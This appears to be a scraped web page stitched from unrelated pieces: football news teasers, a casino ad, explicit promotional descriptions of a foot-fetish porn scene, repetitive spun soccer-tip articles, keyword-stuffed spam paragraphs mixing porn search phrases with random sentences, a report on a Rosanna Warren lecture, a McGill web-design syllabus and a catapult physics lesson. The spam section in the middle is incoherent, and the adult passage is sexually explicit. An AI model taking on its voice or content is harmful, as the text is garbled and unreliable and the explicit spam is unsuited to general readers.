BBC pundit Garth Crooks has chosen his latest team of the week based on the Premier League matches over the weekend. More...
Arsenal have joined Chelsea and Manchester United in the race for the signature of Roma star Radja Nainggolan. More...
Sky Sports pundit Charlie Nicholas has given his prediction of the Champions League clash between Bayern Munich and Real Madrid. More...
Arsenal manager Arsene Wenger says the timing of his departure from the club was not really my decision. More...
Former Real Madrid president Ramon Calderon has revealed that Tottenham striker Harry Kane is a target for the club. More...
Real Madrid star Gareth Bale has refused to rule out that he could leave the Spanish giants at the end of the season. More...
Liverpool have unveiled their new home kit for next season, sticking with the hugely popular retro styling of the current shirt. More...
Tottenham striker Fernando Llorente is reportedly open to leaving the club at the end of the season. More...
Sky Sports pundit Paul Merson has given his prediction of the Premier League clash between Everton and Newcastle. More...
BBC pundit Garth Crooks has chosen his latest team of the week based on the Premier League and FA Cup matches over the weekend. More...
Tired of football? Looking for some casino bonus? What about checking out some very good slot reviews from a credible source.
Meet Samantha Summers! This is her FULLSCENE. She’s a hot blonde beauty I worked with in Florida. This is a great outdoor scene and she also gives her FIRST FOOTJOB next to a pool. She dips her bare feet in the pool and gets them nice and wet and waterlogged. Also, in this full scene, you get her solo foot tease, tease in the Pose Position, foot worship for the first time and also in the Pose, as well and of course the footjob finish where she takes a humongous load to her feet. I also discounted this clip, too.
She’s just one week in and this is her VERY FIRST FOOT FETISH SHOOT OF ANY KIND. This girl immediately became a favorite. I returned to my favorite backyard setting in Florida and shot another outdoor scene. It was a hot, humid sweltering day and the great thing about this super cute 23 year old is, that she loves to wear her Jordans! She has TONS of sneakers and all kinds of Jordans. She also wore NO SOCKS. That means SWEATY FEET! Samantha has really nice high arches and great wrinkled soles and soft creamy fair skin. You’ll see her peel off her sneakers to reveal her wet sweat glistened feet and then holds up her soles to the camera. Her size 7 feet are perfection! Also, check out her purple toenail polish, too. You’ll see her in the Pose Postion and laying on her stomach with her soles facing up and also on her tippy toes.
This is also her FIRST FOOT WORSHIP EVER! She is just too freakin hot. The humid Florida weather is hot but Samantha is sweltering! See me lick her soft wrinkled soles and and suck her toes in various positions including The Pose. This girl loved this so much, she started to moan and suck her finger. It’s so HOT! She’s an incredible girl with a great body and super calves. She ran track in high school. I told her she has cheerleader calves, lol. She can also do a mean toe spread and I licked her bare feet while she did that, as well. You won’t want to miss this sizzling hot foot worship scene!
She is only ONE WEEK in the adult biz and this is her very first foot shoot and her FIRST FOOTJOB!! I don’t know how I keep finding this hotties but the bar has certainly been raised each time. Samantha is so fun and bubbly, just a happy girl who aims to please. We return to my favorite backyard to do a POOLSIDE FOOTJOB! She was so concerned about doing it right and me being able to cum from a footjob. She doesn’t think a guy can get off from a girl’s feet on their cock. She’ll find out soon enough, she is quite skilled and talented with her soles, arches and toes. She does such a fantastic job by knowing how I liked it and started things off my dipping her feet in the pool to make them nice and waterlogged and wet. We begin by me licking her bare feet and her playfully stroking my cock. She then strokes my dick with such a perfect technique, I knew this pop shot was totally covering her pretty size 7 feet with a huge cum load and she holds them up to the camera for you to see!
Hi guys! Chat will no longer work. Please ask all questions here: Contacts All requests for clips you can give on the voting page (soon!).
Soccer is a popular game worldwide, so it is no wonder people want to learn more about it. Reading about soccer and learning about it are very helpful prior to trying to play. Read on to learn more about soccer and how to play.
You should not try taking the ball to the goal unless you are in a good position. Search for teammates to help you if you’re in an area where you’re crowded. Pass the ball to the open teammate as soon as you can rather than dribbling towards the goal on your own.
When you are considering new cleats, take into account your level of playing ability. For example, if you are a beginner, opt for plastic, molded cleats. If your game is more advanced choose cleats that are metal which can be adaptable to many different playing surfaces.
It is crucial that you never allow the ball out of your sight. This is a fast-paced game, and the ball is constantly being passed from player to player in lightning speed. By losing the ball, you allow the other team a better chance of scoring.
Try learning to do the trick the Outside Elastico. This can assist you with cutting on the inside when on the flanks. Start by practicing with a cone or shoe as a marker. Get away from the cone about five steps away. Start by dribbling the ball towards the cone. When you get close, touch outside, then touch insider. Making outside touches tricks your opponents, allowing you to get by them. Remember that the second touch should be bigger than the first one.
Practice makes perfect, in life and in soccer as well. Understand that you will not become a great player in a matter of days. Make some changes to your schedule to you have plenty of time to work on some drills every day. No matter how difficult a skill is, you should practice it. You need to work on your best skills also, since there is always room from improvement.
To improve endurance, train during the off season by engaging in long distance running. Incredibly soccer players run around eight miles each game. By distance training, you will increase your stamina, resulting in the ability to play soccer for longer periods of time without a break.
Soccer is perhaps the most popular sport in the world. However, not everyone understands it. You can now enjoy the health benefits and the sheer pleasure of the game after learning the tips shared here.
Have you been wanting to learn more about the game of soccer? Are you uncertain as to where to start? This article tells you all about how to play the game better. Continue reading to gather the basics of soccer and a few of the more advanced techniques as well.
Avoid collisions between another player and yourself when you can. Know where the opponent is going to be so you don’t have contact. This technique helps you maintain control of the ball, as well as reducing your chances of getting injured.
It seems obvious, but keep your eye focused on the soccer ball all the time. Soccer moves at the speed of light, and the soccer ball can be in control of another player in a flash. Losing sight of the ball could open your team up to giving up a goal.
Do an Outside Elastico. When you are on the flanks, the Outside Elastico is a great way to cut back to the inside. You will need something to represent your opponent’s position like a cone. Your starting position should be about five paces behind the marker. Start to dribble towards it. As you get closer to the cone, gently do an outside touch then a quick inside touch. Making outside touches tricks your opponents, allowing you to get by them. Remember that the second touch must be bigger than the previous one.
Try surprising the other team. Skilled soccer players will be able to quickly spot plays you are doing, and if you do the same plays over and over again, they will predict them every time. You need to get the ball away from you quickly and pass it elsewhere if you’re dealing with a bunch of defenders charging at you.
Get together with your team and work on specific strategies. They need to know what you’ll be doing with the ball so they’re able to get to it at the right time. One thing you could do is cross your ball towards the right for several plays before switching to the left.
If soccer is relatively new to you, then this article was definitely a big help to you. Learning the fundamentals makes the game much more fun to play and also to watch. Now you are more educated and will understand soccer better.
Your soccer experience can be a great one. You must be a sports fan in some capacity, if you weren’t, you would not be reading this. To boost your game, you require the proper knowledge and skills. Read on to find out what it takes to better your soccer game.
Buy well-fitting cleats. They should be comfortable and support your arches well. They need to let your ankles move as they need to as well. If you get the wrong cleats you run the risk of damaging your foot.
Avoid assuming that you are no longer in play after passing the ball. Keep your eye on the ball and wait for your chance. Passing the ball when necessary is a sign of a good player.
Always look for times to practice. Take your ball with you everywhere you go, and do a drill or two whenever you have free time. In addition, you can dribble the ball anytime you are walking.
If you’re seeing too much action where you are with the ball, pass it to someone who isn’t surrounded by action. That will give them time as the defenders approach them to figure out what to do next.
Always be seeking out methods of surprising the opposing team. The opposing team will quickly catch on to any patterns in your game. If defenders are getting closer, make a pass to the nearest open spot rather than following a pattern.
Work out a set of strategies and plays with your team. They ought to anticipate when you plan to send a pass across so that they are able to rush ahead and grab it. One thing you could do is cross your ball towards the right for several plays before switching to the left.
Long-distance running can help build your stamina. Soccer players usually run about eight miles during a game. By running a lot, you can have increased stamina so you’re able to play soccer better without taking as many breaks.
Fake out an approaching defender by pretending to pass the soccer ball to another player. That will stop them for a moment, and you’ll get a chance to think quickly about what you would like to do. If you are animated, the tactic works even better.
You should now be prepared to start practicing. Practice makes perfect. Keep all of this in mind if you want to be a more effective player.
Disclaimer: Footy Lounge is a participant in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for sites to earn advertising fees by advertising and linking to Amazon.com/Amazon.co.uk.
However, many states have also reduced the severity of criminal penalties for juvenile offenders. Anne lockhart nude pics. She has also inspired reams of rapturous acclaim from critics and won admiration from her musical peers. About usOur insightsfind somethingPeopleProgrammesCoursesEventsResearchContact details.
VideoCharlie Wilson discusses the emotional, aesthetic and social motivations that encourage homeowners to install energy efficient measures VideoWhere do social order and disorder come from. Free milf anal porno. Now I am ready to do my breakfast, when having my breakfast coming yet again to read other news.
Nothing wrong with throwing a wrench into the works, but if a character is currently exploring a new room, then suddenly having them be above ground in a restaurant doesn't really work. Audrey Gelman The millennial's millennial, this politically engaged NYC fashionista got with the cool crowd early. This is especially true in light of the emerging dynamism of strong and assertive women in rock and roll, and the increasing acceptance of new wave groups that challenge the listener to think and question existing social relations.
Join in student activities and meetings, and bring a photo album from home to show new friends your home country and its customs. His eyes widen just a little when he feels that slick organ tracing over the kiss. The charity's preferred criteria also include being Roman Catholic, which the OSCR report said amounts to direct discrimination "on the face of it", although it had received only limited information about how strictly this criterion is applied.
Well I tried to talk with her about things and I asked her why she was acting the way she was. I wasn't able to attach to these important work equipment by ipad together with ipad wasn ideal for that disgusted now with horrific system furthermore not enough information logically assume are convinced they'd released a advances url information about disruption the online not.
Chapter one walks throught the histories of the genre, of crime and punishment, placing them within a political-historical context. Soft tits lesbian. But this isn't necessarily so: A person might well not want to be killed even in this situation, if their beliefs or opinions were not against active euthanasia.
He contacted me on OkCupid and we have been corresponding through texts and yahoo messenger. Meet Me A social networking site that lets users tailor their searches for potential social contacts by age and geography.
She said that she was concerned that the publicity might "deter other departments" from seeking a site visit. If a company is literally saying X amount of hires have to be Y, they are doing it wrong. Natalia zardon naked. Or pay someone you trust to do it for you while you enjoy a glass of wine and a game of Sudoku. In many countries, overt forms of discrimination for many but seldom all groups have been outlawed.
Of all the ways to use 'rabid' in a sentence, a feminist shouldn't have been the go-to example. Consequently, janie realizes that the institution has mla essay works cited become a popular.
Or are you saying that you have too much money to give up the amount that the welfare of the unfortunate orphan can depend on. This wouldn't be a rebound if they decide to take it to a more than friends level and so is there anything I can do to bring him back. Of course, I offer you not a scepter, but a high post of our adviser, our minister, our right hand: you will issue decrees and monitor their execution; This post requires cruelty, but do you have this quality to the right degree.
Rosanna Warren, acclaimed poet and distinguished faculty member at the University of Chicago, shared selections from her poetry and personal reminiscences as the guest artist for the 2016 Bettye Jolly Lecture, sponsored by the Eudora Welty Foundation, on March 21 in the Garden at the Eudora Welty House.
Suzanne Marrs, Welty Foundation Scholar-in-Residence and emerita professor of English at Millsaps College, engaged in conversation with her after the lecture. Warren discussed what it was like to grow up in a literary household (her parents were authors Robert Penn Warren and Eleanor Clark) and offered thoughts about her parents’ association and friendship with Eudora Welty.
Warren’s most recent book of poems is Ghost in a Red Hat, published in 2011 by W. W. Norton and Company. Also published by Norton, her second collection of poetry, Stained Glass, received a Lamont Poetry Selection award from the American Academy of Poets in 1993. She is also the author of a book of literary criticism, Fables of the Self: Studies in Lyric Poetry, published in 2008 by Norton.
A member of the American Academy of Arts and Letters and the American Academy of Arts and Sciences, Warren has served as chancellor of the Academy of American Poets. She has received a Pushcart Prize, the Witter Byner Poetry Prize, the Sara Teasdale Award in Poetry, and a Guggenheim Fellowship. Warren was the Emma Metcalf Professor of the Humanities at Boston University and is the Hanna Holborn Gray Distinguished Service Professor for the John U. Nef Committee on Social Thought and the College at the University of Chicago.
She graduated from Yale University in 1976 with a bachelor’s degree in painting and received an MA from the Writing Seminars at the Johns Hopkins University in 1980. In 2000 she was The New York Times Resident in Literature at the American Academy in Rome. During 2008 and 2009, Warren was a fellow of the Dorothy and Lewis B. Cullman Center for Scholars and Writers at the New York Public Library.
The lecture series was inspired by the late Bettye Jolly of Jackson, Mississippi, a long-time docent at the Eudora Welty House and Garden. Jolly, who died in 2014, was also a faithful member of a book club that was initiated in a Great Topics Seminar led by Suzanne Marrs, and the book club wanted to remember her love of reading in this special way and asked the Welty Foundation to assist. Gifts in support of the Bettye Jolly Lecture may be directed to Eudora Welty Foundation, P. O. Box 55685, Jackson, MS 39296-5685 or made on line through this website on the Contribute feature.
'I find that offensive.' has no meaning; it has no purpose; it has no reason to be respected as a phrase. 'I am offended by that.' Well, so fucking what? - Stephen Fry
The DIL Sisterhood | A FREE, Private Community for Daughters-in-Law with Mother-in-Law Drama | By the Founder of MotherInLawHell.com
If you were a member of MotherinLawHell.com, you will need to RE-REGISTER in order to access all the cool new features.
In the DIL Sisterhood, you can swap MIL stories in our DIL Lounge, get advice & more... all in a FREE private community, designed for you to share with other daughters-in-law who know what you’re going through. Join us!
See our YouTube Channel for exclusive DIL Sisterhood programming and other fabulous TV appearances, like Dr. Phil and more!
Her name is Patricia. By day, she is Mrs. Corporate America, by night, she is an “Ann Landers” of sorts. Patricia is the founder of the wildly-popular website,the DIL Sisterhood! More »
Type specimen: HUJ-Pal. EJ 695, a skeleton (complete skeleton). Its type locality is 'Ein Yabrud quarries, which is in a Cenomanian/Cenomanian carbonate limestone in the Bet Meir/Amminadav Formation of Palestinian Territory.
This is a placeholder page for Heidi Brandt, which means this person is not currently on this site. We do suggest using the tools below to find Heidi Brandt.
You are visiting the placeholder page for Heidi Brandt. This page is here because someone used our placeholder utility to look for Heidi Brandt. We created this page automatically in hopes Heidi Brandt would find it. If you are not Heidi Brandt, but are an alumni of Fostoria High School, register on this site for free now.
The High School Network is not affiliated with, endorsed, or sponsored by Fostoria High School	of Fostoria, Ohio
Greeting I want to read full your content but we should translite into english version,it'svery incredible ,but we suggest if you not mind.please visit to our blog and take your choice cool templates ,WE prepared full templates for all
1 Page 1 of 7 Web System Design and Management GLIS 634 Winter 2015 Quick Links Who, When and Where Description Objectives Schedule Text Books Assessments HTML & CSS (30%) Site Redesign Brief (20%) Requirements Teams Site Selection Site Proposal (30%) Requirements Presentation Team Assessment (5%) Final Exam (15%) Submitting Assignments General Information Acknowledgements WARNING: this syllabus is provided for informational use only. The specific content and assignments may change before the start of the course. Students of this course should not use this document but instead retrieve the official version that can be downloaded from the course management site. Instructor: Prof. Charles-Antoine Julien > Class times: Mondays, 2:30-5:30 pm Location: EDU 211 Duration: Jan. 5 th - Mar. 30 th, 2015 Description This course has been developed with the information professional in mind. It seeks to provide students with the skills and understanding that they are most likely to require in their information careers: the strategy, design, and management of a web site. Principles and practices of designing websites in the context of libraries and information centres. Conceptual approach to organizing information for the World Wide Web including design, implementation and management issues. Topics include: Web development tools, markup languages, and Web server administration. Learning Objectives Foundations: Understand the history and architecture of the World Wide Web and its relevance to the organization and dissemination of information; Understand the relevance of the World Wide Web to the information professions(librarians, archivists, and knowledge managers). Development: Understand how HTML and CSS are used to create web pages; Understand how technologies such as JavaScript and PHP are used to create dynamic web sites; Understand the issues relating to developing web sites for mobile and other non-traditional devices; Assess the relevance of Web 2.0 to the domain of the information professions; Understand how to create content for the web; Create simple web pages using HTML and CSS; Design: Understand the various components that make up a site's information architecture (organization, navigation, page layout); Create an information architecture for a web site; Understand how to assess the usability of an existing web site; Understand the importance of branding in web site design. Management: Understand the elements of a web strategy; Create a web strategy for an organization; Assess the performance of a web site; Understand how to manage a web site development project; Understand how to manage the operations of a web site.
3 Page 3 of 7 Krug, Steve (2006). Don't Make Me Think. 2 nd ed. Indianapolis, IN: New Riders. Morville, Peter and Louis Rosenfeld (2007). Information Architecture for the World Wide Web. 3 rd ed. Sepastopol, CA: O'Reilly. Assessments HTML & CSS Markup exercises (30%, individual) A series of increasingly demanding individual HTML & CSS exercises submitted over several weeks, details of the exercises will be provided in separate handouts: 1. Report Markup: Create a simple HTML page (easy) 2. Image Gallery: Create multiple HTML pages with images (easy) 3. Report Display: Use CSS to change how the report from exercise #1 is displayed (Medium) 4. Annual Report: Use HTML and CSS to recreate the formatting of a business document (Medium) 5. Positioning: Using CSS positioning to create standard layouts. (Hard) 6. Curriculum Vitae (30%): Create a web version of your CV. MarkUp 6 will not be graded unless Markup 1-5 are submitted on time (see note below). Markup 1-5 will not be graded but you must submit them the night before their respective in-class review (see schedule) at 11:59pm. Failure to submit any assignment will result in a 25% deduction for MarkUp 6. Note that Markup 1-2 are easy: do not get lured into a false sense of security by assuming the rest are just as easy. They are not. Each exercise must meet the following criteria: HTML code must validate as HTML5. CSS must validate as CSS 3. Note: exercises that do not validate will be deducted by 50% Exercises that contain multiple files must be packaged in a single zip file. No other formats are acceptable (e.g., RAR, multiple files). Multi-file exercises not packaged in a single zip file will be deducted by 20%. HTML & CSS can look different in various browsers (e.g., Internet Explorer, Safari, Chrome, FireFox, etc.): for the purposes of this course, at the very least, ensure that your code works perfectly in the most popular browser. For all elements, your CSS must set cascading default values for colors, font families, and font sizes. When styles are used, they must be in one or many external style sheets. Exercises that use document or inline styles will be deducted by 25%. Use a good number of tags, attributes, and CSS properties. Demonstrate that you've learned and tried various options. This being said, don't use a feature just for the sake of it: implement a feature because it makes sense.
4 Page 4 of 7 Everything eventually changes. Your HTML and CSS must be well organized and formated to make it easy for someone else to read and maintain. The work must be your own. Using tools or web sites that generate code will be considered plagiarism. Such generated code is easy to recognize. Web Site Redesign Project Brief (20%, group) You will prepare a specification for the redesign of an existing web site of a public library or archive. This defines a web strategy and its articulation in terms of the primary users of the site and the tasks they need to perform. Requirements The project brief must include the following: 1. A brief overview of the library/archive, and the community it serves. 2. The overall mission and goals of the library/archive. 3. The top three goals that the library/archive has for its web site, in order of priority*. These are goals that you decide upon based on your understanding of the library/archive, its community, and the capabilities of the web. 4. List and briefly describe the top three categories of people who are the primary audiences for the library/archive's web site, in order of priority*. 5. For each category of user, list, describe, and prioritize * their primary uses of the site. These are the tasks that users should be able to complete or that the site should support Note: your tasks should balance the priorities of the library and the priorities of the user. 6. A brief assessment of the library/archive's current web site, focusing on how well it meets or does not meet the site goals and tasks you have defined above. * Follow the list with a brief justification for your selection and prioritization. Project Teams You will form teams of four people (baring approved exception). Teams are expected to communicate and work together throughout the semester. Everyone on the team is responsible for the entire work, and will receive the same grade for the work submitted. Conflicts between team members should be addressed as soon as possible using honest communication. Unresolvable issues should be brought to the instructor's attention as soon as possible. Selecting a library/archive Web Site The library/archive you choose should be a public library or archive from a North American city or town. For libraries, ideally there should be only one branch serving the population, although you can choose a situation where there are 2-3 branches (i.e. you cannot choose a city like Montreal or Toronto that has a public library system made up of a large number of branches). Most importantly, the web site should be, in your opinion, in need of redesign.
5 Page 5 of 7 The report should be written with the assumption that it will be read by the team of librarians/archivists and developers who will be coming up with a new design for the website, as well as the librarians/archivists who work at the public library/archive in question. The report should be written as concisely as possible. Use headings to organize your report and make it easy to scan. Make good use of lists (bulleted or numbered) and tables to convey information. Avoid the long paragraphs of prose common to most academic papers. Consistently use either APA or MLA citation style. Marks will be deducted from papers that are poorly formatted, organized, presented and/or written. Your report should contain no more than 2000 words (not including the cover page and bibliography). Be concise in your writing, focus on the things that are more important as opposed to being comprehensive. Site Proposal (30%, group) You will work in the same project teams to develop a proposal and prototype Web site to meet the needs of the library/archive described by the Project Brief. Site Proposal Requirements Strategy and objectives: restate the web strategy and site objectives for the site in your own words based on conversations with the client (i.e. the originating project team). Information architecture: propose an information architecture for a site that will support the web strategy. Your information architecture must include: A site structure diagram showing the pages in the site and how they are organized. A general description of the visual elements making up the site described by wireframe diagrams showing the layout for the home page and at least one 'inside' page. Your information architecture must be text-complete, i.e. it must use the actual text that will be presented on the site. This being said, long text can be replaced by placeholder copy. Operational plan: Outline the ongoing work that would be involved in operating the proposed web site. Performance: Describe how you would measure the performance of the site to determine if it was successful. Home Page Prototype: code the HTML/CSS for the home page of the proposed web site. Note: as usual you must use the css reset. The report should be written with the assumption that it will be read by: 1. the client (i.e. the project team who wrote the brief) 2. the librarians who work at the public library/archive in question
6 Page 6 of 7 3. the design and development teams would use the document to plan, estimate, and carry out the first iterations of the site development. Presentation (5/30 points) As part of this assignment your team will need to do a presentation to the class. You will present the library/archive, its community, as well as the web goals and target audience for the site.the objective is to present your site design to the "client". The audience should be able to: 1. understand the design you are proposing 2. believe it meets the requirements defined in the project brief The presentation should be no more than 8 minutes, with an additional 2 minutes for questions. The presentation must include a PowerPoint or PDF slide deck that has to be submitted to mycourses the day before. For the sake of efficiency, no other type of slide deck format is accepted. Each person on the team has to present. You do not have to provide the full design proposal report to the audience; prioritize and choose the content to present. Your proposal should be somewhere between words in length, not including the cover page and bibliography. This word count should only be considered a rough guide, as a good portion of your proposal will likely be presented using diagrams, illustrations, and tables that provide a lot of information without increasing the word count significantly. Again, remember that it is better to focus on the things that are more important than it is to be comprehensive. Use headings to organize your report and make it easy to scan. Make good use of lists (bulleted or numbered) and tables to convey information. Avoid the long paragraphs of prose common to most academic papers. Your report should consistently use either APA or MLA citation style. Note that you still need to properly cite any sources as you would in any academic paper. Marks will be deducted from papers that are poorly formatted, organized, presented and/or written. Teammate Assessment (2.5% for the assessor, 2.5% from other team members) Each team member will assess the overall performance of overy other teammate. The quality of the assessment will dictate your score on 2.5%, and the assessments from your teammates will greatly influence your score on 2.5%, as ultimately chosen by the instructor. Assign a score to each teammate (1 to 5) that represents your willingness to work with this person again. Each teammate's assessment should be a maximum of words (could be much less), for a maximum total of words. Do not feel obliged to say anything if everything went well. The text should explain only less than perfect scores.
7 Page 7 of 7 Final Exam HTML/CSS (15%) The final exam covers theory (i.e., slides and readings) and your practical knowledge of HTML/CSS. All documentation is allowed up to 4 double sided 8.5 by 11 in. paper sheets. You can use both sides of the paper for total of 8 pages of notes. Notes can be in any format (e.g., printed, handwritten, etc.). Submitting your assignments Your assignment must be submitted electronically using the Assignments tool in mycourses. submissions are not accepted. To submit your markup assignments, store your files in a compressed/zip file. Your other assignments must be submitted electronically as an MS Word file (.doc or.docx) or alternately as a PDF file. All diagrams, tables, etc. must be inserted in your document: they cannot be submitted as separate files (.xls,.pdf, etc). Late assignments will not be accepted, and will receive a grade of zero (0). Extensions are only granted in the most exceptional of circumstances, and they must be requested at least one week before the assignment is due. General Information Academic Integrity McGill University values academic integrity. Therefore, all students must understand the meaning and consequences of cheating, plagiarism and other academic offences under the Code of Student Council and Disciplinary Procedures. Academic Policies Additional policies governing academic issues which affect students can be found in the McGill Charter of Students' Rights. Language of Instruction All lectures, discussions, and course materials are in English. However, students have the right to submit their work in French. Students with disabilities If you have a disability please consult the Office for Students with Disabilities Aknowledgements This syllabus is based on the work of Edward Bilodeau from McGill Libraries.
ITC 4310, Web Design and Development Course Syllabus Course Description Presents Web design principles and techniques coupled with practical experience in the design and creation of websites. Includes
Ten Simple Steps Toward Universal Design of Online Courses Implementing the principles of universal design in online learning means anticipating the diversity of students that may enroll in your course
Business Administration Course Number: BUAD 335 Course Title: ELECTRONIC COMMERCE Credits: 3 Calendar Description: This course focuses on the recent growth of buying and selling goods and services over
Shoreline Community College elearning Best Practice Guidelines This document provides recommended guidelines to help improve user experience for any elearning course. Recommendations are based on usability
spring semester course schedule This course is designed to cover the various techniques of web page construction and the graphic design considerations unique to the internet. A challenge for many will
IBRI College of Technology Department of Information Technology. Intercollegiate Web Programming Contest On 12 March, 2013 (Tuesday)
IBRI College of Technology Department of Information Technology Intercollegiate Web Programming Contest On 12 March, 2013 (Tuesday) Eligibility: Web Programming Contest Rules The contest is open to Diploma
CMPT 165 INTRODUCTION TO THE INTERNET AND THE WORLD WIDE WEB Unit 0 Course Introduction Slides based on course material SFU Icons their respective owners 1 How many activities in your life make use of
Office Hours: Monday: 11:30AM 12:30PM Wednesday: 11:30AM 12:30PM Please make an appointment and other hours can be arranged, if you need assistance.
SYLLABUS: MKT 454.022, Monday evening 4:00-6:30pm; BU124 Spring Semester, 2012 Course: Marketing 454, Business-To- Business Marketing, 3 credit hours Department of Management, Marketing, and International
INTRODUCTION Web Development Techniques (Optional) This is one of the three optional courses designed for Semester 3 of the Bachelor of Information Technology Degree program. This course on web development
CompuScholar, Inc. Alignment to South Carolina Web Design and Development I Standards South Carolina Course Details: Course Name: Web Design and Development I a.k.a. Fundamentals of Web Design and Development
INLS 572 - Web Development I Syllabus Lewis Hassell, Ph.D. lhassell@email.unc.edu Office Hours: Thur. 5:30-6:00pm, and by appointment
Business Administration Course Number: BUAD 247 Course Title: TRAINING and DEVELOPMENT Credits: 3 Calendar Description: This course provides an in-depth study of training and development. Topics include
City University of Hong Kong. Information on a Course offered by Department of Computer Science with effect from Semester A in 2014 / 2015
City University of Hong Kong Information on a Course offered by Department of Computer Science with effect from Semester A in 2014 / 2015 Part I Course Title: Web Usability Design and Engineering Course
School of Public Service and Health PADM 699 Master s Capstone Seminar in Public Administration 3 Credit Hours Prerequisite: Completion of all MPA coursework Length of Course: 16 Weeks Instructor Information
Course Duration: One hour Theory and 3 hours practical per week for 15weeks. As taught in 2010/2011 Session
The College Experience COL 101 3 Hours Credit Course Information Course Description: In this course, we will study the best practices for success in college and learning on line by using technology smartly,
Midland College Syllabus ENGL 2311 Technical Writing Course Description: A course designed to enable students to organize and prepare basic technical materials in the following areas: abstracts; proposals;
Direct Quotes include page number Ex. 1 Dr. Romberger (2006) suggests in her syllabus, When in doubt cite it. (p. 2). Ex. 2
Course Syllabus: English 1301 Section 2P and Section 6P Dual Credit Instructor: Janis May NOTE: This syllabus is subject to change during the semester. Please check this syllabus on a regular basis for
1 PHYSICS AND ENGINEERING-MAY THE FORCE BE WITH YOU MAKING A MARVELLOUS MARSHMALLOW LAUNCHER Experiment Objective: Students will design and construct a catapult and use it as a marshmallow launcher. They will learn the simple mechanics behind the catapult and forces. The purpose of this activity is to introduce students to use simple machine to build a device used for launching purposes. Learning Goals: Students will learn the mechanics of a simple machine catapult and use its properties to construct a marshmallow launcher. They will use their knowledge in physics and engineering to launch marshmallows at a certain distance and angle. Students will be able to explore how they can improve their launcher upon trials. LESSON IMPLEMENTATION OUTLINE Introduction: A catapult is a mechanism used to throw missiles in ancient and medieval warfare. At first, catapults were specifically designed to shoot spears or other missiles at a low trajectory. They were originally distinguished from ballistae and trebuchets, both of which were large military engines used to hurl stones and other missiles, but these distinctions later blurred. Soon after, larger catapults mounted on a single arm also hurled stones, pots of boiling oil, and incendiaries at a high trajectory. They were used to attack or defend fortifications. Catapults were widely employed in siege warfare, but with the introduction of artillery they passed from use. In the 20th century catapults using hydraulic pressure were reintroduced to launch aircraft from warships. Lesson Background and Concepts: What Is a Catapult? A catapult is a machine that is similar to a giant slingshot. Objects, such as boulders, can be positioned on the catapult and hurled over distances. Catapults were used in ancient times to attack castles and fortresses by throwing large objects over moats and walls. Modern soldiers have also used catapults: During World War I they were used to propel grenades and gas bombs over long distances. In naval warfare a catapult can be used to launch aircraft from the deck of a ship.
2 How Does It Work? The catapult has a basket on the end of a movable arm strong enough to hold the weight of object it is intended to hurl. Tension is applied to arm, which is forced down and secured in place; springs and twisted ropes are two ways to provide the necessary tension. After the object is added to the basket, the bindings are cut or removed. The arm then succumbs to the tension and flips to the other side, like pulling a rubber band and then releasing. The object is propelled forward. General definition of a catapult: to hurl an object through the air. There are are three primary technologies that fall into the "catapult" category. Catapult -winched-down bucket. -originally, "catapult" is referred to a dartthrower. In modern times, catapult can be used to describe any machine that hurls a projectile. This can include a slingshot used to hurl pebbles and a machine that launches airplanes off aircraft carriers. Ballista -a very large crossbow. -a weapon developed from earlier Greek weapons. It relied upon different mechanics, using two levers with torsion springs, the springs consisting of several loops of twisted skeins. Trebuchet -a weighted beam that swings a sling carrying the projectile. -a trebuchet tends to be easier to build because it consists simply of a pivoting beam and a counterweight that rotates the beam through an arc. Both catapults and ballistas work by storing tension either in twisted ropes or in a flexed piece of wood (in the same way an archery bow does, but on a larger scale).
3 Work can be done on the catapult quite slowly, when the elastic is slowly stretched. This provides a store of elastic potential energy, which can be expended quite quickly in accelerating the stone of ball to a reasonably high speed. Three properties can be exemplified in the use of a catapult: elasticity, energy, and force. Elasticity is seen in the measure of the stretch of the spring loaded in the catapult. This will demonstrate the accuracy of the delivery of the object being flung. Second, energy is present in the conversion of it from potential into kinetic energy. This could demonstrate and determine the range of the object. Finally, force can be studied and measured in the projectile motion. Projectile Motion A projectile is an object upon which the only force acting is gravity. There are a variety of examples of projectiles. An object dropped from rest is a projectile (provided that the influence of air resistance is negligible). An object which is thrown vertically upward is also a projectile (provided that the influence of air resistance is negligible). And an object is which thrown upward at an angle to the horizontal is also a projectile (provided that the influence of air resistance is negligible). A projectile is any object which once projected or dropped continues in motion by its own inertia and is influenced only by the downward force of gravity. By definition, a projectile has only one force acting upon it - the force of gravity. If there was any other force acting upon an object, then that object would not be a projectile. Thus, the free-body diagram of a projectile would show a single force acting downwards and labeled force of gravity. Regardless of whether a projectile is moving downwards, upwards, upwards and rightwards, or downwards and leftwards, the free-body diagram of the projectile is still as depicted in the diagram at the right. By definition, a projectile is any object upon which the only force is gravity.
4 Projectile Motion and Air Resistance If projectiles were only launched from the surface of the moon where there is no atmosphere, then the effects of gravity, as described in the previous section, would be sufficient to determine the flight path. On Earth, however, the atmosphere will influence the motion of projectiles. As opposed to the situation due to purely gravitational effects, projectile motion with air resistance will be dependent on the weight and shape of the object. As one would suspect, lighter objects are more strongly affected by air resistance. In many cases, air resistance will produce a drag force which is proportional to the velocity squared. The effects of increased air drag on an object such as a cannon ball will cause it to fall short of its normal range without air resistance. This effect may be significant. It was realized that cannon balls would travel farther distances if aimed at higher elevations, due to decreased air density and decreased drag. More subtle effects of air resistance on projectile motion are related to the shape and rotation of the object. Clearly, the shape of an object can have an effect on its projectile motion, as anyone has experienced by wadding up a piece of paper before tossing it into the waste can. The rotation of an object is important also. For example, a good quarterback always puts a spin on a football when making a pass. Lab Activity Instructions: Students will perform the construction of a marshmallow launcher in their groups. Instructors will explain the how a catapult works and the basic physics concepts behind the construction. Students are given different materials and they can choose their supply for making the launcher. Upon completion, they will compete for the greatest launching distance. Allow one instructor for demonstration and other instructors as assistants around the classroom. The Problem and Challenge: Design a catapult that will throw a marshmallow the greatest distance.
